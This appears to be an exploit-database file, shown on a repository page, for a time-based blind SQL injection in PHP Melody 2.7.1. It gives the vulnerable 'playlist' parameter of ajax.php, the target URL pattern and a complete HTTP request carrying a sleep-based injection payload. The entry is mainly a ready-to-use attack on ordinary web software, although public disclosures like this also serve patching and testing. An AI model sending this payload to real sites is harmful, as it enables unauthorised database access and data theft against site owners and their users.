07e51f4126
2 changes to exploits/shellcodes D3DGear 5.00 Build 2175 - Buffer Overflow PHP Melody 2.7.1 - 'playlist' SQL Injection
22 lines
No EOL
769 B
Text
22 lines
No EOL
769 B
Text
# Exploit Title: PHP Melody v2.7.1 - SQL Injection
|
|
# Date: 30/12/2017
|
|
# Exploit Author: Ahmad Mahfouz
|
|
# Contact: http://twitter.com/eln1x
|
|
# Vendor Homepage: http://www.phpsugar.com/ Buy http://www.phpsugar.com/phpmelody_order.html
|
|
# Version: 2.7.1
|
|
# Tested on: Mac OS
|
|
#
|
|
# SQL Injection Type: time-based blind
|
|
# Parameter: playlist
|
|
# Page: ajax.php
|
|
# URL: http://target.com/ajax.php?p=video&do=getplayer&vid=[VALID_VIDO_ID]&aid=1&player=detail&playlist=[SQLi]
|
|
|
|
|
|
|
|
GET /ajax.php?p=video&do=getplayer&vid=randomid&aid=1&player=detail&playlist='+(select*from(select(sleep(20)))a)+' HTTP/1.1
|
|
Host: localhost
|
|
Accept: text/html, */*; q=0.01
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
X-Requested-With: XMLHttpRequest
|
|
Connection: close |